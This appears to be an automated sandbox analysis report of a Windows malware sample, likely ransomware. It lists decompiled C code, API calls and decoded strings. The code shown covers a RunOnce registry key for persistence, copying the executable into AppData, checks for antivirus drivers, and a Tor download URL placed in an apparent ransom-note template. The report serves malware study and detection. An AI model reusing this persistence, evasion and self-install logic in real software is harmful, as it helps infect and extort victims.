Opcode ID: d1f30249cd95bc39b6aaba0faa7b489f74f7cbf43fb9d065e2b173b5e3f79159
Instruction ID: 212da481a297ae44d236223c00c74eb70ec09a9958cfcbf066e346efddb49587
Opcode Fuzzy Hash: d1f30249cd95bc39b6aaba0faa7b489f74f7cbf43fb9d065e2b173b5e3f79159
Instruction Fuzzy Hash: 8671387010C3409BEB20DF10C81877B7BE9FB80B58F50851CF6855B292EFBA9549CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0F6943A6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F6943A6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xf6a2000) =  *(_t41 + 0xf6a2000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xf6a2a64 = 0xf6a2000;
				_t60 = E0F6981F0(0xf6a2000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xf6a2000;
						_t49 =  *0xf6a2000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xf6a2000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xf6a2a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
					 *0xf6a2a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000); // executed
				_t44 = E0F697D70( &_a136);
				return _t44;
			}

0x0f6943a6
0x0f6943b0
0x0f6943b0
0x0f6943b7
0x0f6943b8
0x0f6943c4
0x0f6943d8
0x0f6943dc
0x0f6943e0
0x0f6943e0
0x0f6943e2
0x0f6943f4
0x0f6943f8
0x0f6943fd
0x0f694406
0x00000000
0x00000000
0x0f69440a
0x0f69440d
0x0f694413
0x0f694413
0x0f69441b
0x00000000
0x0f694420
0x0f694420
0x0f694420
0x0f694426
0x00000000
0x00000000
0x0f694430
0x0f694432
0x0f69443d
0x0f694441
0x00000000
0x00000000
0x00000000
0x00000000
0x0f694434
0x0f694434
0x0f69443b
0x00000000
0x00000000
0x00000000
0x00000000
0x0f69443b
0x00000000
0x0f694432
0x0f69459e
0x00000000
0x0f69459e
0x00000000
0x0f694447
0x0f694447
0x0f694447
0x0f69444b
0x0f69444e
0x0f694451
0x00000000
0x0f694413
0x0f6943e0
0x0f694456
0x0f69445d
0x0f694465
0x0f69446d
0x0f694475
0x0f69447d
0x0f694485
0x0f69448d
0x0f694495
0x0f69449d
0x0f6944a5
0x0f6944ad
0x0f6944b5
0x0f6944bd
0x0f6944c5
0x0f6944cd
0x0f6944d5
0x0f6944dd
0x0f6944e5
0x0f6944ed
0x0f6944f5
0x0f6944fd
0x0f694505
0x0f69450d
0x0f694515
0x0f69451d
0x0f694525
0x0f69452d
0x0f694535
0x0f69453d
0x0f694545
0x0f694555
0x0f69455b
0x0f694562
0x0f69456f
0x0f694575
0x0f694562
0x0f694586
0x0f694593
0x0f69459d

APIs

lstrcpyW.KERNEL32 ref: 0F6943E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F6943E9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F694555
wsprintfW.USER32 ref: 0F69456F
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0F694586

Strings

h, xrefs: 0F69445D
o, xrefs: 0F6944CD
a, xrefs: 0F694505
r, xrefs: 0F694495
n, xrefs: 0F6944D5
/, xrefs: 0F694475
., xrefs: 0F694535
w, xrefs: 0F6944F5
t, xrefs: 0F69448D
s, xrefs: 0F69446D
y, xrefs: 0F69451D
j, xrefs: 0F6944A5
c, xrefs: 0F6944AD
t, xrefs: 0F694465
l, xrefs: 0F6944FD
w, xrefs: 0F69447D
d, xrefs: 0F6944ED
{USERID}, xrefs: 0F6943BF, 0F69440D, 0F694413
a, xrefs: 0F694515
n, xrefs: 0F69453D
h, xrefs: 0F694525
-, xrefs: 0F69450D
r, xrefs: 0F69449D
., xrefs: 0F6944B5
d, xrefs: 0F6944E5
m, xrefs: 0F69452D
/, xrefs: 0F6944C5
w, xrefs: 0F694485
r, xrefs: 0F6944BD
o, xrefs: 0F6944DD

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
API String ID: 4033391921-3341315666
Opcode ID: 64800ed90c999de4bc72fd4fb9ed7942cd8fb7169f1356101fcc3c282234ae56
Instruction ID: 2a20de752cd98640bed491bf842873fc7aeb78e30eb86291339188d5cf7e3fca
Opcode Fuzzy Hash: 64800ed90c999de4bc72fd4fb9ed7942cd8fb7169f1356101fcc3c282234ae56
Instruction Fuzzy Hash: E4417FB050C341CBDB20DF10D45836ABFE6FB80B59F50891CE6894B252DBBA9599CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0F692960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0F692960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0F6982B0( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

0x0f69296b
0x0f69296d
0x0f692979
0x0f692980
0x0f692984
0x0f69298c
0x0f692993
0x0f69299a
0x0f6929a8
0x0f6929b0
0x0f6929bd
0x0f6929c7
0x0f6929ce
0x0f6929eb
0x0f6929f8
0x0f6929ff
0x0f692a06
0x0f692a0d
0x0f692a14
0x0f692a1b
0x0f692a22
0x0f692a29
0x0f692a30
0x0f692a37
0x0f692a3e
0x0f692a45
0x0f692a4c
0x0f692a53
0x0f692a5a
0x0f692a61
0x0f692a68
0x0f692a6f
0x0f692a76
0x0f692a7d
0x0f692a84
0x0f692a8c
0x0f692ac7
0x0f692a8e
0x0f692aa4
0x0f692aaf
0x0f692ab1
0x0f692ab7
0x0f692abf
0x0f692abf

APIs

lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0F69299D

Part of subcall function 0F6982B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F6982CD
Part of subcall function 0F6982B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F6982FB
Part of subcall function 0F6982B0: GetModuleHandleA.KERNEL32(?), ref: 0F69834F
Part of subcall function 0F6982B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F69835D
Part of subcall function 0F6982B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F69836C
Part of subcall function 0F6982B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F6983B5
Part of subcall function 0F6982B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F6983C3

RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F692C45,00000000), ref: 0F692A84
lstrlenW.KERNEL32(00000000), ref: 0F692A8F
RegSetValueExW.KERNEL32(0F692C45,00520050,00000000,00000001,00000000,00000000), ref: 0F692AA4
RegCloseKey.KERNEL32(0F692C45), ref: 0F692AB1

Strings

r, xrefs: 0F692A3E
H, xrefs: 0F692993
n, xrefs: 0F692A45
e, xrefs: 0F692A7D
R, xrefs: 0F692A68
s, xrefs: 0F692A06
F, xrefs: 0F6929BD
r, xrefs: 0F692A53
A, xrefs: 0F69298C
P, xrefs: 0F69296D
\, xrefs: 0F692A30
r, xrefs: 0F6929FF
n, xrefs: 0F692A6F
f, xrefs: 0F692A0D
S, xrefs: 0F6929B0
I, xrefs: 0F692979
n, xrefs: 0F692A76
U, xrefs: 0F692984
W, xrefs: 0F6929C7
\, xrefs: 0F6929EB
u, xrefs: 0F692A37
i, xrefs: 0F692A1B
i, xrefs: 0F692A5A
d, xrefs: 0F692A22
\, xrefs: 0F692A14
n, xrefs: 0F692A61
i, xrefs: 0F6929F8
V, xrefs: 0F692A4C
R, xrefs: 0F6929CE
w, xrefs: 0F692A29

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: 4d8d79fe25c91d474635c0e6242a3757df40e71ba7a7f7e7f26522fe6a28c066
Instruction ID: afa35ec56a27f95b6a64183ca8dda46c21e073fd0fe3026b6eac9b5597023e22
Opcode Fuzzy Hash: 4d8d79fe25c91d474635c0e6242a3757df40e71ba7a7f7e7f26522fe6a28c066
Instruction Fuzzy Hash: FA31EAB090121DDFEB20CF91E949BEDBFF9FB01709F508119D618AA281D7BA4958CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0F692D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0F692D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E0F692F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0F692C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0F692D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E0F692F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E0F692F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E0F6930A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E0F692AD0(); // executed
				goto L5;
			}

0x0f692d39
0x0f692d3a
0x0f692d3d
0x0f692d45
0x0f692d4a
0x0f692d52
0x0f692d5a
0x0f692d62
0x0f692d67
0x0f692d6f
0x0f692d77
0x0f692d7f
0x0f692d87
0x0f692d8e
0x0f692de9
0x0f692df1
0x0f692df9
0x0f692e01
0x0f692e09
0x0f692e11
0x0f692e22
0x0f692e26
0x0f692e3d
0x0f692e41
0x0f692e49
0x0f692e51
0x0f692e5f
0x0f692e68
0x0f692e6e
0x0f692e73
0x0f692e7b
0x0f692eaf
0x0f692eb4
0x0f692ebc
0x0f692ec8
0x0f692ecf
0x0f692ee3
0x0f692eeb
0x0f692eee
0x0f692eee
0x0f692f09
0x0f692f3d
0x0f692f3f
0x0f692f0b
0x0f692f17
0x0f692f1c
0x0f692f25
0x00000000
0x0f692f17
0x0f692f09
0x0f692ebf
0x0f692ebf
0x0f692e75
0x0f692e75
0x0f692d94
0x0f692d9b
0x00000000
0x00000000
0x0f692da1
0x0f692da9
0x0f692db1
0x0f692db9
0x0f692dc1
0x0f692dc9
0x0f692dd0
0x00000000
0x00000000
0x0f692dd6
0x0f692ddd
0x00000000
0x00000000
0x0f692de3
0x0f692de4
0x00000000

APIs

Part of subcall function 0F692F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F692F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F692E19
LoadCursorW.USER32(00000000,00007F00), ref: 0F692E2E
LoadIconW.USER32 ref: 0F692E59
RegisterClassExW.USER32 ref: 0F692E68
ExitThread.KERNEL32 ref: 0F692E75

Part of subcall function 0F692F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F692F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F692E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F692E81
CreateWindowExW.USER32 ref: 0F692EA7
SetWindowLongW.USER32 ref: 0F692EB4
ExitThread.KERNEL32 ref: 0F692EBF

Part of subcall function 0F692F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0F692FA8
Part of subcall function 0F692F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0F692FCF
Part of subcall function 0F692F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F692FE3
Part of subcall function 0F692F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F692FFA

ExitThread.KERNEL32 ref: 0F692F3F

Part of subcall function 0F692AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F692AEA
Part of subcall function 0F692AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F692B2C
Part of subcall function 0F692AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F692B38
Part of subcall function 0F692AD0: ExitThread.KERNEL32 ref: 0F692C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F692EC8
UpdateWindow.USER32(00000000), ref: 0F692ECF
CreateThread.KERNEL32 ref: 0F692EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F692EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F692F05
TranslateMessage.USER32(?), ref: 0F692F1C
DispatchMessageW.USER32 ref: 0F692F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F692F37

Strings

0, xrefs: 0F692DF1
win32app, xrefs: 0F692E51, 0F692EA0
firefox, xrefs: 0F692E9B
s, xrefs: 0F692D7F
k, xrefs: 0F692D67
1, xrefs: 0F692D6F
f, xrefs: 0F692DA1
s, xrefs: 0F692DB9
d, xrefs: 0F692DA9
w, xrefs: 0F692DB1
s, xrefs: 0F692D77
s, xrefs: 0F692DC1

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: 1c62607cfd2ae6dfa127a278a9a7a3329a991ce1d8659a7996b658d24711c092
Instruction ID: 3405a09a3f4676697c446dc2384bf84402a6d3e1891c39c6e16c5376ceb845f0
Opcode Fuzzy Hash: 1c62607cfd2ae6dfa127a278a9a7a3329a991ce1d8659a7996b658d24711c092
Instruction Fuzzy Hash: 1D518F7014C301AFEB109FA08C19B5B7BECEF44B55F10491DF684AA2C1D7B9A149CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0F692AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0F692AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E0F6981F0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E0F6982B0( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E0F6981F0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E0F692890(_v28, _t50); // executed
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E0F692960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}

0x0f692ad6
0x0f692aea
0x0f692af0
0x0f692af4
0x0f692af6
0x0f692b00
0x0f692b1c
0x0f692b1e
0x0f692b1e
0x0f692b02
0x0f692b02
0x0f692b02
0x0f692b08
0x0f692b10
0x0f692b12
0x0f692b14
0x0f692b14
0x0f692b28
0x0f692b2c
0x0f692b38
0x0f692b3e
0x0f692b43
0x0f692b48
0x0f692b4a
0x0f692b55
0x0f692b62
0x0f692b67
0x0f692b6c
0x0f692b75
0x0f692b89
0x0f692b8e
0x0f692b9c
0x0f692ba2
0x0f692ba5
0x0f692ba7
0x0f692bac
0x0f692bae
0x0f692be4
0x0f692bec
0x0f692bf4
0x0f692bf6
0x0f692bfd
0x0f692c02
0x0f692c05
0x0f692c07
0x00000000
0x00000000
0x0f692c0f
0x0f692c11
0x0f692c16
0x0f692c1d
0x0f692c2c
0x0f692c2c
0x0f692c2c
0x0f692c2e
0x0f692c2e
0x0f692c2f
0x0f692c35
0x0f692c3b
0x00000000
0x0f692c3d
0x0f692c25
0x0f692c2a
0x00000000
0x00000000
0x00000000
0x0f692c2a
0x0f692bb6
0x0f692bb8
0x0f692bbd
0x0f692bc4
0x0f692bd3
0x0f692bd3
0x0f692bd3
0x0f692bd5
0x0f692bd5
0x00000000
0x0f692bd5
0x0f692bcc
0x0f692bd1
0x00000000
0x00000000
0x00000000
0x0f692b4c
0x0f692b4c
0x0f692c40
0x0f692c40
0x0f692c45
0x0f692c47
0x0f692c47

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F692AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F692B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 0F692B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F692B7D

Part of subcall function 0F6982B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F6982CD
Part of subcall function 0F6982B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F6982FB
Part of subcall function 0F6982B0: GetModuleHandleA.KERNEL32(?), ref: 0F69834F
Part of subcall function 0F6982B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F69835D
Part of subcall function 0F6982B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F69836C
Part of subcall function 0F6982B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F6983B5
Part of subcall function 0F6982B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F6983C3

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F692B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 0F692BE4
lstrcatW.KERNEL32(00000000,?), ref: 0F692BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 0F692BF4
wsprintfW.USER32 ref: 0F692C35
ExitThread.KERNEL32 ref: 0F692C47

Strings

U, xrefs: 0F692B75
"%s", xrefs: 0F692C2F
AppData, xrefs: 0F692B97
\Microsoft\, xrefs: 0F692BDE
.exe, xrefs: 0F692BEE
P, xrefs: 0F692B55
I, xrefs: 0F692B6C

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

